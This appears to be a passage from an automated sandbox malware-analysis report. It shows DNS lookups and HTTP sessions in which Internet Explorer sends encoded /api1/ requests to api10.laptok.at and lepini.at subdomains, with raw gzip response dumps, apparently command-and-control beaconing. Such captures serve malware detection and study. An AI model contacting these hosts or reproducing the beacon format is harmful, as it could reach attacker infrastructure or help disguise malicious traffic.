                                                                                                                                                                                                    Feb 15, 2021 21:26:09.076967955 CET8.8.8.8192.168.2.50xa9c0No error (0)web.vortex.data.msn.comweb.vortex.data.microsoft.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                    Feb 15, 2021 21:26:09.550903082 CET8.8.8.8192.168.2.50x2ffNo error (0)geolocation.onetrust.com104.20.184.68A (IP address)IN (0x0001)
                                                                                                                                                                                                    Feb 15, 2021 21:26:09.550903082 CET8.8.8.8192.168.2.50x2ffNo error (0)geolocation.onetrust.com104.20.185.68A (IP address)IN (0x0001)
                                                                                                                                                                                                    Feb 15, 2021 21:26:09.847328901 CET8.8.8.8192.168.2.50x53e8No error (0)contextual.media.net23.210.250.97A (IP address)IN (0x0001)
                                                                                                                                                                                                    Feb 15, 2021 21:26:11.795772076 CET8.8.8.8192.168.2.50x1abeNo error (0)lg3.media.net23.210.250.97A (IP address)IN (0x0001)
                                                                                                                                                                                                    Feb 15, 2021 21:26:14.172207117 CET8.8.8.8192.168.2.50x4575No error (0)hblg.media.net23.210.250.97A (IP address)IN (0x0001)
                                                                                                                                                                                                    Feb 15, 2021 21:26:15.099294901 CET8.8.8.8192.168.2.50xe967No error (0)cvision.media.netcvision.media.net.edgekey.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                    Feb 15, 2021 21:26:15.265760899 CET8.8.8.8192.168.2.50x5df8No error (0)srtb.msn.comwww.msn.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                    Feb 15, 2021 21:26:15.265760899 CET8.8.8.8192.168.2.50x5df8No error (0)www.msn.comwww-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                    Feb 15, 2021 21:26:16.513926983 CET8.8.8.8192.168.2.50x53dbNo error (0)img.img-taboola.comtls13.taboola.map.fastly.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                    Feb 15, 2021 21:26:16.513926983 CET8.8.8.8192.168.2.50x53dbNo error (0)tls13.taboola.map.fastly.net151.101.1.44A (IP address)IN (0x0001)
                                                                                                                                                                                                    Feb 15, 2021 21:26:16.513926983 CET8.8.8.8192.168.2.50x53dbNo error (0)tls13.taboola.map.fastly.net151.101.65.44A (IP address)IN (0x0001)
                                                                                                                                                                                                    Feb 15, 2021 21:26:16.513926983 CET8.8.8.8192.168.2.50x53dbNo error (0)tls13.taboola.map.fastly.net151.101.129.44A (IP address)IN (0x0001)
                                                                                                                                                                                                    Feb 15, 2021 21:26:16.513926983 CET8.8.8.8192.168.2.50x53dbNo error (0)tls13.taboola.map.fastly.net151.101.193.44A (IP address)IN (0x0001)
                                                                                                                                                                                                    Feb 15, 2021 21:26:43.323553085 CET8.8.8.8192.168.2.50xa1d5No error (0)api10.laptok.at34.65.144.159A (IP address)IN (0x0001)
                                                                                                                                                                                                    Feb 15, 2021 21:26:46.846108913 CET8.8.8.8192.168.2.50x2695No error (0)api10.laptok.at34.65.144.159A (IP address)IN (0x0001)
                                                                                                                                                                                                    Feb 15, 2021 21:26:50.146209955 CET8.8.8.8192.168.2.50x74dfNo error (0)api10.laptok.at34.65.144.159A (IP address)IN (0x0001)
                                                                                                                                                                                                    Feb 15, 2021 21:27:39.821945906 CET8.8.8.8192.168.2.50x874cNo error (0)c56.lepini.at34.65.144.159A (IP address)IN (0x0001)
                                                                                                                                                                                                    Feb 15, 2021 21:27:49.128356934 CET8.8.8.8192.168.2.50x362dNo error (0)resolver1.opendns.com208.67.222.222A (IP address)IN (0x0001)
                                                                                                                                                                                                    Feb 15, 2021 21:27:49.130829096 CET8.8.8.8192.168.2.50x4cf5No error (0)resolver1.opendns.com208.67.222.222A (IP address)IN (0x0001)
                                                                                                                                                                                                    Feb 15, 2021 21:27:49.726691961 CET8.8.8.8192.168.2.50x54f6No error (0)api3.lepini.at34.65.144.159A (IP address)IN (0x0001)
                                                                                                                                                                                                    Feb 15, 2021 21:27:50.688483000 CET8.8.8.8192.168.2.50xf41aNo error (0)api3.lepini.at34.65.144.159A (IP address)IN (0x0001)
                                                                                                                                                                                                    Feb 15, 2021 21:27:51.898437023 CET8.8.8.8192.168.2.50xfc4No error (0)api3.lepini.at34.65.144.159A (IP address)IN (0x0001)

                                                                                                                                                                                                    HTTP Request Dependency Graph

                                                                                                                                                                                                    • api10.laptok.at
                                                                                                                                                                                                    • c56.lepini.at
                                                                                                                                                                                                    • api3.lepini.at

                                                                                                                                                                                                    HTTP Packets

                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                    0192.168.2.54975534.65.144.15980C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                                    Feb 15, 2021 21:26:43.380824089 CET3073OUTGET /api1/QSqnACLeyr6hdgRM/z5FskeEfxxW4Q1R/GsITkxgk46HCnUm5Kd/11eB4QB_2/FS2OIfou_2BVahhCN2i1/lN05g44fSdWuZ34SVM_/2F18tQh3ZP_2B9CZltVRIM/NAJawsHjH4mX4/XILaVciO/5e8TUIFZ7ccd8Dn_2F8wtDN/DA_2BihyHs/BqbIiQ7x5yFYJOUsg/scHsHuDvL_2F/a38zFWCcfG3/xo4sCKeZx_2FgB/qzrd3KTzhXtd1iKJfTVBW/TIaj2x4Rf3CB0n8w/wlBMav7PHwJXLsZ/IliJcWNYhk60Yrdjmm/3OHtbL5dY/ANYcc2W_2Bf_2FIiYenV/jXNvqJX5m02G5/F HTTP/1.1
                                                                                                                                                                                                    Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                                                                                                                                    Accept-Language: en-US
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                    Host: api10.laptok.at
                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                    Feb 15, 2021 21:26:43.847129107 CET3074INHTTP/1.1 200 OK
                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                    Date: Mon, 15 Feb 2021 20:26:43 GMT
                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                    Strict-Transport-Security: max-age=63072000; includeSubdomains
                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                    Content-Encoding: gzip
                                                                                                                                                                                                    Data Raw: 32 30 30 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 14 9b 47 72 83 50 10 44 0f c4 82 9c 96 e4 9c 33 3b 32 08 10 88 0c a7 37 5e b9 5c b6 15 fe 9f e9 7e af ca 32 5a 92 58 bd c3 b3 ad 5f 41 52 c6 09 17 b1 36 d6 87 7b 19 67 96 45 82 56 ad 6a 44 6e 28 33 5e a6 77 10 c3 2d ea 6b 90 60 5f 0a 1d 88 64 ca 72 64 3f ad 1a e1 7b 51 60 10 c8 64 6b 84 05 ed c1 8c 20 51 6a 52 11 7e b2 9e 3d 18 a6 b3 a6 56 61 a7 e5 a8 e5 63 87 16 01 32 fc 47 4b 15 a2 0a f9 51 ce 05 27 cc 42 9b c3 d4 f5 b3 4b 35 64 92 02 40 7f 65 e3 d6 9c 1b a8 a6 51 3f 7e d4 d5 90 1f 4b d7 f7 6d a0 cf ae 19 22 f7 51 c4 75 fc 9d da 7c 03 ea 45 73 63 4c cc 0b ff 0d 81 24 b7 39 9b 7b 78 69 ae 14 2b ec 74 f6 5b aa 78 e6 8f de 13 6d 35 9d 4d 8f c1 d1 df a5 f9 f2 c1 85 a9 19 8c 64 a9 7c d2 c4 e2 7c 44 2e bd be db 84 54 b5 c4 87 93 94 35 3a ec e4 58 b5 52 5b 7a b3 2c 4d 19 bf cc ea 4d b4 f1 71 9a a2 5a 07 f0 ef c1 bd 2d 5c c3 86 50 40 8e 80 48 19 87 8f 1c 8f 74 7c 26 2a c2 29 1f 40 18 14 a7 0b 44 d0 39 7d 74 41 b1 f4 50 05 a3 ba fa 71 9b c4 0b 02 96 37 94 21 2e c2 2f 6a 98 ef 93 57 3f 95 c9 8f 3d cf 92 9b 07 20 20 2d 06 d0 69 ab b8 df 8d 28 ff b1 e1 b3 7e c9 44 4d 07 18 3e 80 d8 3e 77 7f 0d 64 3c aa d4 c3 ef 01 91 29 b3 33 32 b7 c5 18 ea ad 04 71 81 8a 9b 87 e7 40 69 0a 60 d7 ce 66 f5 b0 d8 2f 16 38 df 63 9f 4b e3 a6 b2 e0 7d 04 f3 f0 87 f4 fe 16 07 57 29 fd 42 60 08 74 0e 5e 7b b1 a1 56 8f 1c 38 63 9c 16 48 06 08 25 07 46 8c ee 8d 1e f5 11 4d 06 c0 6f 85 ef a7 96 5f 12 bb 82 22 31 88 a4 51 fa 44 b0 cd c1 d7 47 df d5 0f 40 cd 9e f4 34 1c fd 93 9e e9 c6 c7 f8 07 ab 0b 89 c2 fa 64 84 e0 5a 10 e1 31 02 e9 91 98 98 5b 92 12 d2 fc 1a 41 03 79 03 bb de bf 73 2f 22 1a 1a f1 48 f5 5e a8 67 d8 74 1f 84 ba bd 23 7b a2 e8 da 3e ad a8 8e 61 04 20 e3 6c 7e 0c 47 c4 f3 0a ff 78 fd b8 20 3a a1 48 e6 0e 90 14 a4 61 81 5a 75 de c6 d7 36 c7 00 57 92 08 f1 49 03 b5 72 a2 f8 44 c4 e3 3a 7a e6 ee a2 e3 33 50 ba a6 81 27 63 dd 13 f8 53 66 27 8f 61 1e 16 0c a5 8c 70 18 8f 60 26 a1 a2 d3 14 36 93 70 3b 64 da 52 44 8f a4 18 ca be 81 39 04 57 65 d1 b6 4d d8 f7 cc 68 61 a2 52 5c 2f 20 ea e7 d7 cf 3e f4 ab aa 43 69 c7 66 cb be cf 2f 70 2e 31 23 88 ad 10 7a e6 5a dd ef 69 e5 dd 88 4e f9 1c 4a 45 8b 7a 3f d4 9d 85 4e 3f f2 94 b1 a8 80 5d 36 a5 f8 dd dd ae 36 23 ef ff 00 1d 14 d2 b9 5c 7c a5 9b 02 66 1f 7f 74 3a 40 ed 77 ab 38 25 10 01 14 5f e2 8f bf d6 df 7e 20 b3 4b ad ee 62 66 c3 09 05 6e d1 95 75 6b 86 d5 b3 00 ca d1 4f b6 81 87 c1 ba c4 28 07 4c a1 62 2c 71 18 6e 49 d8 6d ce 0f ea d3 97 a2 7b bf ba 89 61 0f f7 e0 42 b7 5d 19 71 7b 20 82 4b 68 20 ce c7 fe 1a 3b a5 78 37 d7 da d6 71 35 d7 c7 31 b5 46 34 38 97 1f fb 09 8a d9 c6 86 66 04 ac 14 f9 f7 19 66 04 77 e8 af 23 49 48 2c 94 82 a7 93 f7 52 2d 12 22 ac fa 3d c1 66 0f 08 c1 ae 15 34 12 b5 a7 7b 9b 1d 03 b5 b7 e3 40 a3 91 1d 94 f6 a3 e5 e9 11 c4 91 75 bc 9f 2d 6b 8f fd 0c 2a b7 19 63 b8 f0 17 b3 9c 8e 60 b2 2e f8 3b 03 bd e5 07 c9 71 9b 50 46 81 d9 35 59 4e c7 44 07 25 7b e4 f9 c2 82 f0 fb 00 65 fa bb dc c5 05 05 74 bf 43 39 f1 a5 1e 8b 05 42 06 c9 7c 60 50 e4 2b a3 a4 2e 37 62 d3 dc 4d 7a 1e 8f 22 01 7d 19 87 3d 46 3c 4e 66 85 47 fe 95 7e 01 8a 2b 7c ca 9c 95 7f 8d c4 e4 fb 35 f7 30 f0
                                                                                                                                                                                                    Data Ascii: 2000GrPD3;27^\~2ZX_AR6{gEVjDn(3^w-k`_drd?{Q`dk QjR~=Vac2GKQ'BK5d@eQ?~Km"Qu|EscL$9{xi+t[xm5Md||D.T5:XR[z,MMqZ-\P@Ht|&*)@D9}tAPq7!./jW?= -i(~DM>>wd<)32q@i`f/8cK}W)B`t^{V8cH%FMo_"1QDG@4dZ1[Ays/"H^gt#{>a l~Gx :HaZu6WIrD:z3P'cSf'ap`&6p;dRD9WeMhaR\/ >Cif/p.1#zZiNJEz?N?]66#\|ft:@w8%_~ KbfnukO(Lb,qnIm{aB]q{ Kh ;x7q51F48ffw#IH,R-"=f4{@u-k*c`.;qPF5YND%{etC9B|`P+.7bMz"}=F<NfG~+|50


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                    1192.168.2.54975634.65.144.15980C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                                    Feb 15, 2021 21:26:44.306616068 CET3287OUTGET /favicon.ico HTTP/1.1
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                    Host: api10.laptok.at
                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                    Feb 15, 2021 21:26:44.431600094 CET3287INHTTP/1.1 404 Not Found
                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                    Date: Mon, 15 Feb 2021 20:26:44 GMT
                                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                    Content-Encoding: gzip
                                                                                                                                                                                                    Data Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                    2192.168.2.54976034.65.144.15980C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                                    Feb 15, 2021 21:26:46.909322977 CET3346OUTGET /api1/9a3FdV_2FOe2lNWBzywhye/a2rzbdQuOhRbh/1tMI9TP_/2FFHpcEjc2zIsj3nY_2FaRD/bbKOnK6Aw9/T9Li8ZpaG0hs_2FEE/_2B0kgl3vplN/HPMJmXJvTbm/kjHzz19HUtkaT1/4BDTN7ZVSNKtMR3H5nP4a/s8_2F3CxujepwtCo/By36bxNYadNwz_2/FEk2aSXfXLicJH7n4U/7D_2FTfi5/cc2nrD5Ag2qXRkQmnDt6/1GTWH5aoTuyoAdeDUx1/UqFEv13ML45n9P1f5D7a2h/spqio1V138YVU/_2FSoCJL/_2BPfPH_2FwmC1xDPsgb90b/lJFlQYaXBd/gV1Ci2eCEez/TspIchn HTTP/1.1
                                                                                                                                                                                                    Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                                                                                                                                    Accept-Language: en-US
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                    Host: api10.laptok.at
                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                    Feb 15, 2021 21:26:47.384097099 CET3374INHTTP/1.1 200 OK
                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                    Date: Mon, 15 Feb 2021 20:26:47 GMT
                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                    Strict-Transport-Security: max-age=63072000; includeSubdomains
                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                    Content-Encoding: gzip
                                                                                                                                                                                                    Data Raw: 32 30 30 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 14 9b c5 7a 83 50 10 46 1f 28 0b dc 96 b8 4b 70 d8 21 c1 dd e1 e9 4b bb ec 97 92 70 ef cc 3f e7 90 5b bc 31 37 2b 68 26 65 55 4b 91 92 ab 92 ab e1 70 70 58 e5 e7 58 97 69 84 d0 e0 93 41 f4 11 d9 40 08 ee b9 6c 9a 02 4f 18 29 46 c5 1e a1 02 11 c1 8c 8e 6e 3a 47 d0 cf 75 10 ad 31 a4 03 6d d4 01 5f b3 87 30 b7 92 73 d8 f0 49 a6 93 bb 09 40 18 89 cb 85 e6 82 86 12 9a 05 a8 f8 f5 cb 7a 3f 34 32 08 3b 7b f4 4a 28 04 c6 51 78 e0 f7 4b a4 29 9d be e6 8d 84 a1 a2 b1 3c ab eb 88 92 9c fe ad ca 58 cd 29 b2 90 6f a4 66 83 39 58 b9 10 b5 96 04 22 8f 23 60 36 31 b8 ee b9 85 d5 f5 65 ae 8e c7 5a 9f 8f ec 16 3a c6 85 9f df 19 86 86 53 f6 48 f2 c4 1d c4 cf 5a 30 71 54 14 07 3d 64 95 8a 36 6f 75 43 20 1f e0 c7 6e d2 37 ef bd 8f 20 cc 1e f7 45 c2 61 6a 57 22 68 0a b5 ce 46 15 39 aa 2b 7a 8a fd 94 78 84 f6 58 dd 2f 9f 53 e0 9f 76 68 d8 1f b5 cb 69 67 69 d7 7c 05 ba 87 2b 1a 37 fd 1c 37 cd ee 2b 55 cb b2 5d a6 8f 49 52 31 2f 7c 52 27 9b b0 81 52 32 a8 58 e5 56 a7 8c ec 84 b0 ef 06 46 ee e5 03 7a e9 c3 70 c8 5d 2c 54 b9 41 a8 7f 77 43 3a bd e7 37 bb 85 70 54 30 fe 61 8c 4b 07 ac d3 c0 6e 53 a9 7e 4f 62 c4 d3 77 22 66 6a e3 1c 63 6d 73 ce 2d b6 7b 46 55 72 2c d4 92 8d 0f 08 7b fa 4f 87 ed 04 a0 67 39 36 5c a7 67 05 58 b0 86 09 51 a7 d4 d7 9a ba 4a 00 71 24 39 1a 3b a1 85 c0 9f 92 de 62 da af 05 19 90 33 ca a9 61 08 6b f9 48 9d 44 50 a5 95 30 e7 8e 84 50 ce d3 3f 24 ed ec bd d7 c4 68 21 4d 7a e5 cf 23 35 fd 4b 39 b4 0a 9f 09 0c 61 f4 23 6e 42 31 77 db 0f 95 0b f7 9e 72 09 d4 4c 1a b7 71 10 81 1f 46 f2 f9 b8 67 b9 2f 32 92 b3 72 7a 9e 62 7b b9 1f 87 60 b6 96 7d 60 6f f5 3b 12 18 af e3 33 dd fe ec ee 42 a0 18 8c bf 36 bd ce b8 d2 67 c4 eb eb b9 af 08 6d d9 f1 0b a1 0a 12 e0 7a 40 7e 9d 6c 1b 68 07 f6 1c cc eb 1e 26 67 6b 9e 90 be c6 30 12 20 8c ff 48 01 c6 ed 69 ad e9 3e 6b 36 fe 37 7f 11 b2 a1 07 37 e5 0a b3 07 f6 cf ca 44 5c 6a fe e8 73 62 1a 4d 04 b8 e5 fe e9 c8 b7 a6 4e c2 c4 b5 bd 11 b1 3a 61 ad c5 f7 ae 52 aa 02 0c c0 47 dd 26 d7 7c d3 dc c8 39 11 de 3e 14 2b 8f 67 60 da 3e 93 39 3b fe e0 72 45 7d 19 c7 f6 ae 4b 54 d5 bc 7a ee ce 2d 16 d8 f0 95 6e 7b d9 43 c8 3d ee 8f 21 8b 16 f0 b1 dc e9 21 97 6c b6 91 c9 f2 22 8e e3 62 9a 78 4a d4 85 64 20 82 8f 3d 86 b2 c5 a1 63 5a b9 f1 24 3c 15 0e 0c 1d fa e0 9f f0 44 4c 46 2a 06 99 d9 20 94 73 a7 69 de d5 7d f6 95 64 78 18 70 f9 1d 17 62 90 12 29 7a 9e 3c 64 df ba 43 13 a3 45 75 4b 6c 31 0b 9d 15 b3 b6 da af eb 2f 9f 24 96 7a 29 c2 c3 59 2b 5a f8 94 eb a5 ae a2 79 ef f2 0f 3d b2 41 a1 9e a6 64 41 14 51 c6 3b db a6 f7 28 21 67 6d 0a 1e ae ef f7 f0 cb 21 2a eb 88 6d ea 96 b9 6b 1c 33 e3 ad e8 5e 10 85 50 33 e2 b7 37 bf 25 1f b2 2e 16 fa 4b 05 6f b7 25 01 e7 bb 5d 47 a7 08 1b ea f4 2a 21 91 00 56 3f 19 17 7f e4 1b 32 16 64 ce 8c e5 a3 80 4e 42 95 ec 41 17 c1 79 41 78 39 5f b8 00 e5 f1 85 25 c4 00 22 05 28 48 86 e4 3b 36 7d a9 ee fd c3 b2 2a 59 81 f0 58 0e 2b d4 b1 2c 39 b1 b8 14 1b e1 0b e5 93 19 90 f2 86 ed 75 aa c7 96 ef 32 d5 a9 07 71 07 83 ed 7e 84 7b b5 0a 43 15 e0 41 3d 30 5c 93 92 78 35 ed 01 59 d1 6a e9 9d 3a 23 f2 df 07 aa a1 21 41 eb 00 72 e7 d9 83 61 45 1d a2 35 0f 35 d1 e6 bc
                                                                                                                                                                                                    Data Ascii: 2000zPF(Kp!Kp?[17+h&eUKppXXiA@lO)Fn:Gu1m_0sI@z?42;{J(QxK)<X)of9X"#`61eZ:SHZ0qT=d6ouC n7 EajW"hF9+zxX/Svhigi|+77+U]IR1/|R'R2XVFzp],TAwC:7pT0aKnS~Obw"fjcms-{FUr,{Og96\gXQJq$9;b3akHDP0P?$h!Mz#5K9a#nB1wrLqFg/2rzb{`}`o;3B6gmz@~lh&gk0 Hi>k677D\jsbMN:aRG&|9>+g`>9;rE}KTz-n{C=!!l"bxJd =cZ$<DLF* si}dxpb)z<dCEuKl1/$z)Y+Zy=AdAQ;(!gm!*mk3^P37%.Ko%]G*!V?2dNBAyAx9_%"(H;6}*YX+,9u2q~{CA=0\x5Yj:#!AraE55


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                    3192.168.2.54976134.65.144.15980C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                                    Feb 15, 2021 21:26:47.958450079 CET3641OUTGET /favicon.ico HTTP/1.1
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                    Host: api10.laptok.at
                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                    Feb 15, 2021 21:26:48.081315994 CET3641INHTTP/1.1 404 Not Found
                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                    Date: Mon, 15 Feb 2021 20:26:48 GMT
                                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                    Content-Encoding: gzip
                                                                                                                                                                                                    Data Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                    4192.168.2.54976334.65.144.15980C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                                    Feb 15, 2021 21:26:50.211947918 CET3662OUTGET /api1/aE3Chvy15YwtGBM5c3w/ZiymrrSsY1vMIEeQ79sLxc/QkfYDB83GeV6h/wfm_2Fba/IxaOhm6BSIFzHirA83QDIG_/2FbmOJUxF8/ud5_2Fql9hZq1SzAT/Mwor9Yan0pTL/Fp7ZNYW1P4i/kA3p_2Ft9A_2Fs/RuUNpyL5CsQBX14_2BDvT/1fDvmlCtb0dss45p/clOsmGOkIAiGzqR/LxhkYHtCoZLc014ID_/2BtL4MOOe/oIJGNpJMiO7LF1VXD1cY/3TSy0R_2FzpOndwhSFh/jEmLA5uqXYEdrQwipf8a_2/FYxkdf4zOPfe0/vr4tnHHd/_2Fh2Azy7z8mKYRQWXwGF6y/SDOEEBL HTTP/1.1
                                                                                                                                                                                                    Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                                                                                                                                    Accept-Language: en-US
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                    Host: api10.laptok.at
                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                    Feb 15, 2021 21:26:50.666774988 CET3666INHTTP/1.1 200 OK
                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                    Date: Mon, 15 Feb 2021 20:26:50 GMT
                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                    Strict-Transport-Security: max-age=63072000; includeSubdomains
                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                    Content-Encoding: gzip
                                                                                                                                                                                                    Data Raw: 37 36 63 0d 0a 1f 8b 08 00 00 00 00 00 00 03 0d 94 35 b2 ad 00 00 43 17 44 81 5b f1 0b e0 e2 ee d2 e1 ee ce ea ff eb 33 93 49 ce 24 af 04 77 c5 49 30 a8 12 a5 a8 b6 a2 5f 8b 54 b2 76 d5 66 ff 0d 57 1e 19 f4 a9 6d 4f b3 8e 5d 45 3e 09 2d 0c e2 b5 e8 b3 78 a7 0e 77 9b 12 07 06 8a 34 67 0b 51 e1 e3 63 ff d2 ba 88 2a d0 67 de 7e 35 cb 0f 69 99 96 72 61 db 7b 64 dc e9 f2 d6 a6 75 f4 53 a0 da 04 4e 16 a0 fc 4e ed c7 26 8a 5a ea 13 9a 6e ed 08 0b 7c cc 3a 04 f3 0e 55 97 6e e6 ab 00 c3 c8 6a 3e 3d 02 cc c5 94 d7 1a 93 3d c4 4d 8c 9d e5 36 2c 6b 04 b0 a2 35 67 c4 32 d5 e1 dd e7 70 62 be a2 0e 18 bc 38 ba ab b1 7a 36 52 97 d5 24 07 50 19 12 89 13 47 0d 36 af 5b bb fa cd cb b8 0a f6 31 6f c5 40 c9 03 8d 2d 41 90 b6 41 4f ad da 6b 65 9e 25 e9 71 cd af da a4 99 20 88 95 3c 3c 66 1c 12 d8 9f 8e cd 93 47 d0 b6 47 a6 5b 04 6f 4d d2 8b 2f cf c7 e4 84 5d 76 cd cc af 49 1e d7 6c b8 90 2b 8d 5d a1 d9 c6 fa dd 05 61 75 4a 98 d3 fd 73 72 8d 75 74 4f fa 17 62 27 63 f7 72 0f 18 74 fd 12 89 50 ca 7f 95 5e cd b5 30 ed 73 02 4d ec 8d 0e fd 6a 8f 0f da 19 f4 c1 29 eb 63 52 47 f1 ce 75 99 1f a8 ab b7 5d e0 01 7b 63 e8 a3 2a 8a 29 e0 2c ab fb a8 d5 b7 a0 1b 15 fd a7 ad 41 18 48 22 e2 d4 38 f9 9c 35 fc 68 a4 a6 73 e4 17 a6 16 e5 90 0a 7c e9 12 c4 d4 42 af 20 53 e5 0d 82 c1 75 23 a0 da 29 78 00 6c 96 a6 b6 f0 b2 79 50 06 8b 8d 2e 02 32 5d 59 db de 2a 32 51 3b 0f f5 98 d5 90 e7 2c 7f 06 f2 ea 77 56 4b 3d 0a a4 93 d9 56 ad c5 34 a9 de 9d 38 55 c9 0a 16 a6 fe 75 f3 6e 90 f4 ec 0d 36 62 44 46 cb c3 58 ac 57 f0 99 73 4d da be 94 43 fe b3 08 9c 2e e9 a7 a1 d7 81 0c 6a ef e0 04 38 67 b6 ca 8b 92 ac e9 da 9e da 9b 01 31 84 4c e0 20 e9 ea c0 df 5e a6 72 73 1b a0 2f 9d 2e cc ce 52 45 79 86 4d b4 30 84 ce c2 4a ee a4 ba b5 15 ce f4 61 a3 d3 79 43 24 bf 0f 43 7c ff c0 cc 2b 95 da dc cb 22 a5 92 42 4d 22 3a 81 36 29 0b 65 c7 aa 04 c9 2a 2b b0 64 0f 11 06 cc ba 7e be df 28 6e 54 a5 32 6c 65 68 e7 f9 07 6e 08 80 ea 46 14 a1 19 01 c9 3c 88 40 2b b0 05 d6 aa 94 1b 6a a7 ab ce e4 84 d8 5c be ce df 6d 1c 47 d8 88 00 c1 81 61 93 7c dc 1d c0 25 b1 8a 12 5c 2b af c4 07 a2 d2 d9 6f 70 2d ff 42 85 e4 9f 43 10 83 a9 d9 91 44 72 12 00 65 f4 0f f9 5b c1 46 b7 42 8c 2c 85 17 d5 a5 c2 60 d0 68 fa 83 d4 c6 c5 a4 05 25 0a aa c0 bc 66 ae 9b d3 f8 8b 2e c1 d9 f3 88 fe cb 